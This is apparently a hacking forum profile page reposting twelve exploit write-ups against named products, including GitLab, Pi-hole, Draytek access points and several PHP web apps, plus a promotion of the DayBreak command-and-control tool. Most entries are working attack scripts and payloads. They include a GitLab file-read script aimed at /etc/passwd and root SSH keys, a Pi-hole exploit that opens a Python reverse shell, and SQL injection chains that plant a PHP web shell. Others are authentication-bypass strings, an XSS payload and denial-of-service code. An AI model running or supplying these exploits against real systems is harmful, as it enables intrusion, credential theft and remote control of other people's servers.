Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    GitLab 12.9.0 - Arbitrary File Read

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GitLab 12.9.0 - Arbitrary File Read # Google Dork: - # Date: 2020-05-03 # Exploit Author: KouroshRZ # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Ubuntu 18.04 (but it's OS independent) # CVE : - ##################################################################################################### # # # Copyright (c) 2020, William Bowling of Biteable, a.k.a vakzz # # All rights reserved. # # # # Redistribution and use in source and compiled forms, with or without modification, are permitted # # provided that the following conditions are met: # # # # * Redistributions of source code must retain the above copyright notice, this list of # # conditions and the following disclaimer. # # # # * Redistributions in compiled form must reproduce the above copyright notice, this list of # # conditions and the following disclaimer in the documentation and/or other materials provided # # with the distribution. # # # # * Neither the name of William Bowling nor the names of Biteable, a.k.a vakzz may be used to # # endorse or promote products derived from this software without specific prior written permission. # # # ##################################################################################################### # Exploit Title: automated exploit for Arbitrary file read via the UploadsRewriter when moving and issue in private gitlab server # Google Dork: - # Date: 05/03/2020 # Exploit Author: KouroshRZ # Vendor Homepage: https://about.gitlab.com # Software Link: https://about.gitlab.com/install # Version: tested on gitlab version 12.9.0 # Tested on: Ubuntu 18.04 (but it's OS independent) # CVE : - import requests import json from time import sleep # For debugging proxies = { 'http' : '127.0.0.1:8080', 'https' : '127.0.0.1:8080' } session = requests.Session() # config host = 'http[s]://<gitlab-address>' username = '<you-gitlab-username>' password = '<your-gitlab-password>' lastIssueUrl = "" def loginToGitLab(username, password): initLoginUrl = '{}/users/sign_in'.format(host) initLoginResult = session.get(initLoginUrl).text temp_index_csrf_param_start = initLoginResult.find("csrf-param") temp_index_csrf_param_end = initLoginResult.find("/>", temp_index_csrf_param_start) csrf_param = initLoginResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2] temp_index_csrf_token_start = initLoginResult.find("csrf-token") temp_index_csrf_token_end = initLoginResult.find("/>", temp_index_csrf_token_start) csrf_token = initLoginResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") submitLoginUrl = '{}/users/auth/ldapmain/callback'.format(host) submitLoginData = { 'utf8=' : '✓', csrf_param : csrf_token, 'username' : username, 'password' : password, } submitLoginResult = session.post(submitLoginUrl, submitLoginData, allow_redirects=False) if submitLoginResult.status_code == 302 and submitLoginResult.text.find('redirected') > -1: print("[+] You'e logged in ...") def createNewProject(projectName): initProjectUrl = '{}/projects/new'.format(host) initProjectResult = session.get(initProjectUrl).text temp_index_csrf_param_start = initProjectResult.find("csrf-param") temp_index_csrf_param_end = initProjectResult.find("/>", temp_index_csrf_param_start) csrf_param = initProjectResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2] temp_index_csrf_token_start = initProjectResult.find("csrf-token") temp_index_csrf_token_end = initProjectResult.find("/>", temp_index_csrf_token_start) csrf_token = initProjectResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") tmp_index_1 = initProjectResult.find('{}/{}/\n'.format(host, username)) tmp_index_2 = initProjectResult.find('value', tmp_index_1) tmp_index_3 = initProjectResult.find('type', tmp_index_2) namespace = initProjectResult[tmp_index_2 + 7 : tmp_index_3 - 2] createProjectUrl = '{}/projects'.format(host) createProjectData = { 'utf8=' : '✓', csrf_param : csrf_token, 'project[ci_cd_only]' : 'false', 'project[name]' : projectName, 'project[namespace_id]' : namespace, 'project[path]' : projectName, 'project[description]' : '', 'project[visibility_level]' : '0' } createProjectResult = session.post(createProjectUrl, createProjectData, allow_redirects=False) if createProjectResult.status_code == 302: print("[+] New Project {} created ...".format(projectName)) def createNewIssue(projectName, issueTitle, file): global lastIssueUrl initIssueUrl = '{}/{}/{}/-/issues/new'.format(host, username, projectName) initIssueResult = session.get(initIssueUrl).text temp_index_csrf_param_start = initIssueResult.find("csrf-param") temp_index_csrf_param_end = initIssueResult.find("/>", temp_index_csrf_param_start) csrf_param = initIssueResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2] temp_index_csrf_token_start = initIssueResult.find("csrf-token") temp_index_csrf_token_end = initIssueResult.find("/>", temp_index_csrf_token_start) csrf_token = initIssueResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") createIssueUrl = '{}/{}/{}/-/issues'.format(host , username, projectName) createIssueData = { 'utf8=' : '✓', csrf_param : csrf_token, 'issue[title]' : issueTitle, 'issue[description]' : '![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})'.format(file), 'issue[confidential]' : '0', 'issue[assignee_ids][]' : '0', 'issue[label_ids][]' : '', 'issue[due_date]' : '', 'issue[lock_version]' : '0' } createIssueResult = session.post(createIssueUrl, createIssueData, allow_redirects=False) if createIssueResult.status_code == 302: print("[+] New issue for {} created ...".format(projectName)) tmp_index_1 = createIssueResult.text.find("href") tmp_index_2 = createIssueResult.text.find("redirected") lastIssueUrl = createIssueResult.text[tmp_index_1 + 6: tmp_index_2 - 2] print("[+] url of craeted issue : {}\n".format(lastIssueUrl)) def moveLastIssue(source, destination, file): # Get destination project ID getProjectIdUrl = '{}/{}/{}'.format(host, username, destination) getProjectIdResult = session.get(getProjectIdUrl).text tmpIndex = getProjectIdResult.find('/search?project_id') projectId = getProjectIdResult[tmpIndex + 19 : tmpIndex + 21] #print("Project : {} ID ----> {}\n".format(destination, projectId)) # Get CSRF token for moving issue # initIssueMoveUrl = '{}/{}/{}/-/issues/{}'.format(host, username, source, issue) initIssueMoveUrl = lastIssueUrl initIssueMoveResult = session.get(initIssueMoveUrl).text temp_index_csrf_token_start = initIssueMoveResult.find("csrf-token") temp_index_csrf_token_end = initIssueMoveResult.find("/>", temp_index_csrf_token_start) csrf_token = initIssueMoveResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2] # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n") # Move issue with associated CSRF token # moveIssueUrl = "{}/{}/{}/-/issues/{}/move".format(host, username, source, issue) moveIssueUrl = lastIssueUrl + "/move" moveIssueData = json.dumps({ "move_to_project_id" : int(projectId) }) headers = { 'X-CSRF-Token' : csrf_token, 'X-Requested-With' : 'XMLHttpRequest', 'Content-Type' : 'application/json;charset=utf-8' } moveIssueResult = session.post(moveIssueUrl, headers = headers, data = moveIssueData, allow_redirects = False) if moveIssueResult.status_code == 500: print("[!] Permission denied for {}".format(file)) else: description = json.loads(moveIssueResult.text)["description"] tmp_index = description.find("/") fileUrl = "{}/{}/{}/{}".format(host, username, destination, description[tmp_index+1:-1]) print("[+] url of file {}: \n".format(f, fileUrl)) fileContentResult = session.get(fileUrl) if fileContentResult.status_code == 404: print("[-] No such file or directory : {}".format(f)) else: print("[+] Content of file {} read from server ...\n\n".format(f)) print(fileContentResult.text) print("\n****************************************************************************************\n") if __name__ == "__main__": loginToGitLab(username, password) createNewProject("project_01") createNewProject("project_02") # Put the files you want to read from server here # The files on server should have **4 or more permission (world readable files) files = { '/etc/passwd', '/etc/ssh/sshd_config', '/etc/ssh/ssh_config', '/root/.ssh/id_rsa', '/var/log/auth.log' # ... # ... # ... } for f in files: createNewIssue("project_01", "issue01_{}".format(f), f) moveLastIssue("project_01", "project_02",f) sleep(3)
  2. HireHackking

    FlashGet 1.9.6 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC) # Date: 2020-05-02 # Author: Milad Karimi # Testen on: Kali Linux # Software Link: http://www.flashget.com/en/download.htm?uid=undefined # Version: 1.9.6 # CVE : N/A #!/usr/bin/python from time import sleep from socket import * res = [ '220 WELCOME!! :x\r\n', '331 Password required for %s.\r\n', '230 User %s logged in.\r\n', '250 CWD command successful.\r\n', '257 "%s/" is current directory.\r\n' # <-- %s B0f :x ] buf = 'A' * 332 s = socket(AF_INET, SOCK_STREAM) s.bind(('0.0.0.0', 21)) s.listen(1) print '[+] listening on [FTP] 21 ...\n' c, addr = s.accept() c.send(res[0]) user = '' for i in range(1, len(res)): req = c.recv(1024) print '[*][CLIENT] %s' % (req) tmp = res[i] if(req.find('USER') != -1): req = req.replace('\r\n', '') user = req.split('\x20', 1)[1] tmp %= user if(req.find('PASS') != -1): tmp %= user if(req.find('PWD') != -1): tmp %= buf print '[*][SERVER] %s' % (tmp) c.send(tmp) sleep(5) c.close() s.close() print '[+] DONE' # Discovered By : Milad Karimi
  3. HireHackking

    MPC Sharj 3.11.1 - Arbitrary File Download

    HireHackking posted a blog entry in Hacker Technology
    # Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download # Exploit Author : SajjadBnd # Date : 2020-05-02 # Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip # Tested on : Ubuntu 19.10 # Version : 3.11.1 Beta ############################ # # [ DESCRIPTION ] # # MPC Sharj is a free open source script for creating sim card credit card's shop. # # [POC] # # Vulnerable file: download.php # parameter : GET/ "id" # 69: readfile readfile($file); # 55: $file = urldecode(base64_decode(strrev($file))); # 53: $file = trim(strip_tags($_GET['id'])); # # payload : [ # Steps: # # 1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=) # 2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L) # 3. your payload is ready ;D # http://localhost/download.php?id==Q2dzNXYw9yY0V2L # #] # import requests import os from base64 import b64encode def clear(): linux = 'clear' windows = 'cls' os.system([linux, windows][os.name == 'nt']) def banner(): print ''' ############################################################## ############################################################## #### # ######### # #### ######### ##### #### ### ###### ## #### ###### #### ############# ##### #### #### #### ### #### ###### #### ################### #### ##### ## #### #### ####### ################### #### ###### ##### #### ############ ################### #### ############### #### ############ ############# ##### #### ############### #### ##666######### ###### ############################################################## ############################################################## ###### MPC Sharj 3.11.1 Beta - Arbitrary File Download ##### ############################################################## ''' def exploit(): target = raw_input('[+] Target(http://example.com) => ') read_file = raw_input('[+] File to Read => ') read_file = b64encode(read_file) target = target+"/download.php?id"+read_file[::-1] r = requests.get(target,timeout=500) print "\n"+r.text if __name__ == '__main__': clear() banner() exploit()
  4. HireHackking

    School File Management System 1.0 - 'username' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: School File Management System 1.0 - 'username' SQL Injection # Date: 2020-05-04 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: username # Injected Request POST /sfms/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 173 Origin: http://localhost Connection: close Referer: http://localhost/sfms/admin/index.php Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g Upgrade-Insecure-Requests: 1 username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login= //Comment Above request will print database name and MariaDB version.
  5. HireHackking

    Draytek VigorAP 1000C - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-05-07 # Vendor: https://www.draytek.com/ # Software: https://www.draytek.com/products/vigorap-903/ # CVE: N/A Document Title: =============== Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2244 Common Vulnerability Scoring System: ==================================== 4 Product & Service Introduction: =============================== https://www.draytek.com/ https://www.draytek.com/products/vigorap-903/ Affected Product(s): ==================== Draytek [+] VigorAP 1000C | 1.3.2 [+] VigorAP 700 | 1.11 [+] VigorAP 710 | 1.2.5 [+] VigorAP 800 | 1.1.4 [+] VigorAP 802 | 1.3.2 [+] VigorAP 810 | 1.2.5 [+] VigorAP 900 | 1.2.0 [+] VigorAP 902 | 1.2.5 [+] VigorAP 903 | 1.3.1 [+] VigorAP 910C | 1.2.5 [+] VigorAP 912C | 1.3.2 [+] VigorAP 918R Series | 1.3.2 [+] VigorAP 920R Series | 1.3.0 [+] All other VigorAP Series with Radius Module Vulnerability Disclosure Timeline: ================================== 2020-05-07: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation vulnerability has been discovered in the official Draytek VigorAP product series application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent input validation web vulnerability is located in the username input field of the RADIUS Setting - RADIUS Server Configuration module. Remote attackers with limited access are able to inject own malicious persistent script codes as username. Other privileged user accounts execute on preview of the modules context. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Vulnerable Module(s): [+] RADIUS Setting - RADIUS Server Configuration - Users Profile Vulnerable Input(s): [+] Username Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information an steüs below to continue. PoC: Payload <iframe src=evil.source onload=alert(document.domain)></iframe> PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp) <div class="box"> <table width="652" cellspacing="1" cellpadding="2"> <tbody><tr> <th id="userName">Username</th> <th id="passwd">Password</th> <th id="confirmPasswd">Confirm Password</th> <th id="configure">Configure</th> </tr> <tr> <td><input maxlength="24" type="text" id="addusr"></td> <td><input maxlength="24" type="password" id="addpwd"></td> <td><input maxlength="24" type="password" id="addpwdcfm"></td> <td><input type="button" id="btnAddUser" value="Add" class="add" onclick="addUser()"> <input type="button" id="btnCancelUser" value="Cancel" class="add" onclick="cancelUser()"></td> </tr> </tbody></table> <table class="content" width="652" cellspacing="1" cellpadding="2"> <tbody id="usersTb"> <tr> <th id="userNo">NO.</th> <th id="userNames">Username</th> <th id="userSelect">Select</th> </tr> <tr><td>1</td><td>test</td><td><input type="checkbox"><input type="hidden" value="test"></td></tr> tr><td>2</td><td><iframe src=evil.source onload=alert(document.domain)></iframe></td><td><input type="checkbox"> <input type="hidden" value="asd"></td></tr></tbody> </table> <p><input type="button" id="btnDelSelUser" value="Delete Selected" class="del" onclick="delSelUser()"> <input type="button" id="btnDelAllUser" value="Delete All" class="del" onclick="delAllUser()"> </p></div> Reference(s): http:/vigorAP.localhost:50902/ http:/vigorAP.localhost:50902/home.asp Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
  6. HireHackking

    Car Park Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Car Park Management System 1.0 - Authentication Bypass # Date: 2020-05-07 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: phone and password #Injected Request #Below request will allow authentication bypass POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 52 Origin: http://localhost Connection: close Referer: http://localhost/Car%20Park%20Management%20System/ Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd Upgrade-Insecure-Requests: 1 phone=' or '1'='1&password=' or '1'='1&Submit=Log+In
  7. HireHackking

    Title: Penetration Artifact DayBreak

    HireHackking posted a blog entry in Hacker Technology
    This article continues to recommend a tool similar to MSF CS to you. Use DayBreak to easily generate corresponding shells. Management is also very convenient and supports cross-platform! Installation Here we take kali installation as an example. Demonstrate for everyone! Go to the official download of the corresponding installation package and go to Kali. Official website address: https://daybreak.tophant.com Install chmod +x nserver_linux_amd64 in kali ./nserver_linux_amd64 server -tls The first startup will generate a password, such as: Init admin password: thftmpok automatically generates config.yaml. Please modify the platform_host address to your external IP address. Restart before it takes effect Visit https://127.0.0.1:1337 Apply for License User Experience New listener: Just set the name and port Set Agent Select the Agent to adapt to the platform Copy the corresponding command and run it in the target server. According to the command situation, this tool can support reverse callback acquisition. During actual penetration, the server side of the tool needs to be placed in the public network server. Test this directly using the browser to access it Manage Sessions After running the command, in session management, we can see that the device is online. View system information File Management Summary In fact, we have also mentioned similar tools before. You can refer to the following historical recommendation articles. Overall, the functions are pretty good. Historical recommendation - Supershell A stunning tool - Domestic individual penetration artifact-Yakit - Penetration testing tool Viper - Penetration frame empire graphics tool Starkiller
  8. HireHackking

    Online Clothing Store 1.0 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload # Date: 2020-05-05 # Exploit Author: Sushant Kamble and Saurav Shukla # Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 #Vulnerable Page: Products.php #Exploit Open Products.php and select any product Fill details Create php shell code with below script <?php echo shell_exec($_GET['e'].' 2>&1'); ?> Click on upload Image Select php file Click Submet Access below URL: http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir add system commands after e to execute it.
  9. HireHackking

    Pisay Online E-Learning System 1.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution # Exploit Author: Bobby Cooke # Date: 2020-05-05 # Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE) # Vulnerable Source Code: # /e-learningsystem/admin/login.php # 121 $email = trim($_POST['user_email']); # 122 $upass = trim($_POST['user_pass']); # 123 $h_upass = sha1($upass); # 132 $user = new User(); # 134 $res = $user::userAuthentication($email, $h_upass); # /e-learningsystem/include/accounts.php # 3 class User { # 23 static function userAuthentication($email,$h_pass){ # 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'"); # /e-learningsystem/admin/modules/lesson/edit.php # 6 @$id = $_GET['id']; # 7 if($id==''){ # 10 $lesson = New Lesson(); # 11 $res = $lesson->single_lesson($id); # /e-learningsystem/include/lessons.php # 4 class Lesson { # 5 protected static $tblname = "tbllesson"; # 35 function single_lesson($id=0){ # 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1"); import requests, sys, re requests.packages.urllib3.\ disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) def webshell(SERVER_URL): try: while True: cmd = raw_input('C:\\ ') command = {'cmd': cmd} r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False) response = r2.text cleanResponse = response.replace('AAAAAAAAAAAAAAA', '') cleanResponse = cleanResponse.replace('313371337', '') print(cleanResponse) except: print("\r\nExiting.") sys.exit(-1) if __name__ == "__main__": if len(sys.argv) != 2: print "(+) Usage: %s <SERVER_URL>" % sys.argv[0] print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0] sys.exit(-1) SERVER_URL = sys.argv[1] ADMIN_URL = SERVER_URL + 'admin/login.php' LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php' s = requests.Session() s.get(SERVER_URL, verify=False) payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''} s.post(ADMIN_URL, data=payload1, verify=False) payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'} r1 = s.get(LESSON_URL, params=payload2, verify=False) dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text)) dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath) dataPath=re.sub('">.*$', '', dataPath) dataPath=dataPath.replace('\\\\', '/') xamppPath=re.sub('xampp.*', 'xampp', dataPath) payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","<?php echo shell_exec($_GET[\'cmd\']);?>","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'} print(payload3) s.get(LESSON_URL, params=payload3, verify=False) webshell(SERVER_URL)
  10. HireHackking

    Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC) # Exploit Author : LiquidWorm # Date : 2020-05-06 # Vendor: Extreme Networks # Product web page: https://www.extremenetworks.com # Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf # Affected version: <=11.x #!/bin/bash # # # Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit # # # Vendor: Extreme Networks # Product web page: https://www.extremenetworks.com # Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf # Affected version: <=11.x # # Summary: Aerohive HiveOS is the network operating system that powers # all Aerohive access points, based on a feature-rich Cooperative Control # architecture. HiveOS enables Aerohive devices to organize into groups, # or 'hives', which allows functionality like fast roaming, user-based # access control and fully stateful application-aware firewall policies, # as well as additional security and RF networking features - all without # the need for a centralized or dedicated controller. # # Desc: An unauthenticated malicious user can trigger a Denial of Service # (DoS) attack when sending specific application layer packets towards the # Aerohive NetConfig UI. This PoC exploit renders the application unusable # for 305 seconds or 5 minutes with a single HTTP request using the action.php5 # script calling the CliWindow function thru the _page parameter, denying # access to the web server hive user interface. # # Vendor mitigation: # CLI> no system web-server hive-ui enable # # Tested on: Hiawatha v9.6 # # # Vulnerability discvered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5566 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php # # # 05.12.2019 # if [ "$#" -ne 1 ]; then echo -ne "\nUsage: $0 [ipaddr]\n\n" exit fi IP=$1 SBYTES=`echo -e \ "\x61\x63\x74\x69\x6f\x6e\x2e"\ "\x70\x68\x70\x35\x3f\x5f\x70"\ "\x61\x67\x65\x3d\x43\x6c\x69"\ "\x57\x69\x6e\x64\x6f\x77\x26"\ "\x5f\x61\x63\x74\x69\x6f\x6e"\ "\x3d\x67\x65\x74\x26\x5f\x61"\ "\x63\x74\x69\x6f\x6e\x54\x79"\ "\x70\x65\x3d\x31"`##_000000251 curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"
  11. HireHackking

    Pi-hole < 4.4 - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # Pi-hole <= 4.4 RCE # Author: Nick Frichette # Homepage: https://frichetten.com # # Note: This exploit must be run with root privileges and port 80 must not be occupied. # While it is possible to exploit this from a non standard port, for the sake of # simplicity (and not having to modify the payload) please run it with sudo privileges. # Or setup socat and route it through there? import requests import sys import socket import _thread import time if len(sys.argv) < 4: print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port* *(Optional) root*") print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.") exit() SESSION = dict(PHPSESSID=sys.argv[1]) TARGET_IP = sys.argv[2] LOCAL_IP = sys.argv[3] LOCAL_PORT = sys.argv[4] if len(sys.argv) == 6: ROOT = True # Surpress https verify warnings # I'm asuming some instances will use self-signed certs requests.packages.urllib3.disable_warnings() # Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet # I opted to use the Python3 reverse shell one liner over the full PHP reverse shell. payload = """<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> """ %(LOCAL_IP, LOCAL_PORT) def send_response(thread_name): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((LOCAL_IP,int(80))) sock.listen(5) connected = False while not connected: conn,addr = sock.accept() if thread_name == "T1": print("[+] Received First Callback") conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") else: print("[+] Received Second Callback") print("[+] Uploading Payload") conn.sendall(bytes(payload, "utf-8")) conn.close() connected = True sock.close() _thread.start_new_thread(send_response,("T1",)) # Fetch token resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False) response = str(resp.content) token_loc = response.find("name=\"token\"") token = response[token_loc+20:token_loc+64] # Make request with token data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) if resp.status_code == 200: print("[+] Put Stager Success") # Update gravity resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(3) _thread.start_new_thread(send_response,("T2",)) # Update again to trigger upload resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) print("[+] Triggering Exploit") try: requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False) except: # We should be silent to avoid filling the cli window None
  12. HireHackking

    Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection # Google Dork: N/A # Date: 2020-05-07 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Discription: The Online AgroCulture Farm Management System v1.0 application is vulnerable to SQL injection via the 'pid' parameter on the review.php page. # vulnerable file : review.php http://localhost/AgroCulture/review.php?pid=27 Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli GET AgroCulture/review.php?pid=27 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m Connection: keep-alive Upgrade-Insecure-Requests: 1 